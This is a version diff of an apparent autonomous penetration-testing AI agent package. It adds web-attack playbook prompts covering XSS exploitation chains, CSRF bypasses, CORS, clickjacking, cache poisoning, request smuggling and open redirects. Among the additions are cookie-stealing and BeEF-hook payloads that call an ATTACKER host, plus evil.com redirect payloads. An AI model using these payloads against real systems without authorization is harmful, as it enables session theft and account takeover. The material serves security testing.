pentesting 0.44.1 → 0.46.0

package/dist/prompts/web.md

@@ -96,6 +96,31 @@ LDAP error → LDAPi → web_search("LDAP injection payload")
   - → Gets 10+ alternative payloads automatically (SVG, IMG, event handlers, encoding variants)
 **3. Blind XSS:** Setup callback server → inject payload with callback URL → wait
 **4. DOM-based:** Analyze JavaScript for sinks (innerHTML, document.write, eval) that use user-controlled sources (location.hash, postMessage)
+**5. Exploitation chains (XSS is NOT just alert(1)):**
+  - **Session theft:** `<script>fetch('http://ATTACKER/'+document.cookie)</script>` → admin session → admin panel → shell
+  - **CSRF via XSS:** `<script>fetch('/admin/adduser',{method:'POST',body:'user=hacker&role=admin'})</script>` → create admin account
+  - **Keylogger:** inject JS keylogger → capture all typed credentials from victim
+  - **Credential phishing:** inject fake login form via XSS → harvest real passwords
+  - **BeEF hook:** `<script src="http://ATTACKER:3000/hook.js"></script>` → full browser control
+  - **Worm:** self-replicating stored XSS → compromise all users automatically
+  - → See exploit.md Cross-Reference Matrix for full XSS chains
+
+#### CSRF (Cross-Site Request Forgery)
+
+**1. Detection:** Check for CSRF tokens on state-changing forms/APIs
+  - No token? → CSRF likely possible
+  - Token present? → Check: is it validated? Try removing, empty, same for all users
+**2. Exploitation:**
+  - Password change: forge request → change admin password → login → RCE
+  - Email change: forge → change email → password reset → account takeover
+  - Admin actions: forge → create admin user, modify settings, upload files
+**3. Bypass techniques when CSRF protection exists:**
+  - Remove token parameter entirely → sometimes server ignores absence
+  - Use another user's token → sometimes not session-bound
+  - Change request method (POST→GET) → different validation path
+  - SameSite=Lax bypass → top-level navigation via GET
+  - Sub-domain with XSS → bypass SameSite cookie
+  - → `web_search("CSRF bypass techniques {year}")`
 
 #### SSRF / IDOR / Path Traversal
 
@@ -156,6 +181,77 @@ If file upload exists → test bypass systematically:
 When serialized data is detected (Java: rO0AB, PHP: O:, .NET: AAEAAAD, Python pickle):
 - web_search("{language} deserialization exploit ysoserial")
 - Build payload → test → RCE
+- See exploit.md Cross-Reference Matrix for chaining
+
+#### CORS Misconfiguration
+
+```
+1. Check: curl -sI -H "Origin: https://evil.com" http://<target>/api/
+   → Access-Control-Allow-Origin: https://evil.com = VULNERABLE
+   → Access-Control-Allow-Credentials: true = CRITICAL (auth data exfiltration)
+2. Test null origin: curl -H "Origin: null" → sometimes allowed
+3. Test subdomain: curl -H "Origin: https://sub.target.com" → wildcard subdomain?
+4. Exploit → host JS on attacker page to steal authenticated API responses
+```
+
+#### Clickjacking
+
+```
+1. Check: response headers for X-Frame-Options or CSP frame-ancestors
+   → Missing = frameable = clickjacking possible
+2. Create HTML: <iframe src="http://<target>/settings" style="opacity:0">
+3. Overlay with attacker UI → trick user into clicking hidden buttons
+4. High-value targets: change password, disable 2FA, authorize app, transfer funds
+5. Bypass X-Frame-Options: web_search("clickjacking bypass frame-busting {year}")
+```
+
+#### Web Cache Poisoning / Deception
+
+```
+Poisoning (affect OTHER users):
+1. Find unkeyed inputs: X-Forwarded-Host, X-Original-URL, custom headers
+2. Inject payload via unkeyed header → cached → served to all users
+3. XSS in cached response → mass user compromise
+→ web_search("web cache poisoning unkeyed headers param miner")
+
+Deception (steal OTHER users' data):
+1. Request: /account/profile.css → server ignores .css, serves profile page
+2. Cache stores authenticated page content → attacker fetches cached page
+3. Try: /victim-only-page/nonexistent.js, /api/me/test.css
+→ web_search("web cache deception attack techniques")
+```
+
+#### Mass Assignment / Parameter Tampering
+
+```
+1. Register/update with extra fields: {"username":"me","role":"admin","isAdmin":true}
+2. Try adding: admin, role, verified, balance, credits, is_staff, permissions
+3. Check API schema (Swagger/OpenAPI) for hidden fields not shown in UI
+4. Method: replay registration/update request with extra parameters
+5. web_search("{framework} mass assignment protection bypass")
+```
+
+#### HTTP Request Smuggling
+
+```
+When target uses reverse proxy + backend (CDN → WAF → app):
+1. CL.TE: Content-Length processed by frontend, Transfer-Encoding by backend
+2. TE.CL: Transfer-Encoding processed by frontend, Content-Length by backend
+3. Impact: bypass WAF, access admin endpoints, poison cache, hijack requests
+4. Use smuggling to access endpoints blocked by WAF → direct exploitation
+→ web_search("HTTP request smuggling CL.TE TE.CL techniques {year}")
+→ web_search("HTTP/2 request smuggling h2c smuggling")
+```
+
+#### Open Redirect
+
+```
+1. Test redirect/callback parameters: ?url=, ?redirect=, ?next=, ?return=
+2. Payloads: //evil.com, \/\/evil.com, /\evil.com, //evil%00.com
+3. Chain: steal OAuth tokens if redirect_uri is vulnerable
+4. Chain: bypass SSRF restrictions by redirecting through open redirect
+5. Phishing: legitimate-looking URL redirects to fake login page
+```
 
 ### Phase 4: Verify and Escalate
 

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "pentesting",
-  "version": "0.44.1",
+  "version": "0.46.0",
   "description": "Autonomous Penetration Testing AI Agent",
   "type": "module",
   "main": "dist/main.js",